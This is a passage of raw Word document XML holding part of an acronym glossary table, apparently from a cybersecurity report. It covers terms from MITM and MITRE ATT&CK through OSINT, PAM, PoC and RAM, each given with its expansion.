            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="15F884EF" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Management Information System</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="2396D8B8" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="68310D9F" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>MITM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3CE47630" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Man-In-The-Middle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="21EA6631" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6D04D70B" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>MITRE ATT&amp;CK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6DBAB6C8" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>MITRE: MITRE Corporation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F03052D" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ATT&amp;CK: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Adviserial</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> Tactics Techniques and Common Knowledge</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="1092416E" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="385F2D48" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>MP3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="365907F0" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>MPEG Audio Layer 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="1BE047C2" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="55E4D820" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>MPEG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4744222F" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Moving Picture Experts Group</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="6AC03E18" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="062D996C" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>MySQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1E6383B3" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>My (name of founder’s daughter) SQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="7AF9DF52" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6C1B1747" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>NAS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6658E298" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Network Attached Storage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="74DBFCC5" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5EF94187" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>NATO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1B53B1E2" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>North Atlantic Treaty Organization</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="797D5613" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="367D1152" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>OOXML</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="770E4516" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Office Open XML</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="15563A30" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="585C051F" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Org</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5D3D5798" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Organisation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="01B14AD4" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2803005B" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>OS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="16317063" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Operating System</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="74CF68D7" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="099057B9" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>OSI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="01820A3D" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Open Systems Interconnection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="69292446" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="53F5F4DF" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>OSINT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1DBFFBBC" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Open Source</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>INTelligence</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="1F451FAA" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6A618E7C" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>PaaS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3BA40AF5" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Platform-as-a-Service </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="3DF7C5E9" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="39DC7B40" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>PAM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5A710C75" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Pluggable Authentication Modules</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="685C57CC" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="65705A94" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>PAM (service)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="224FBEED" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Privileged Access Management</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="1693EE71" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="39A114D0" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>PHP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="73A83205" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Hypertext Preprocessor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="13270572" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="442F2C02" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>PoC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="60B82317" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Proof of Concept</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="0D96C1AA" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5B08A2F4" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>RAM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="756061D9" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
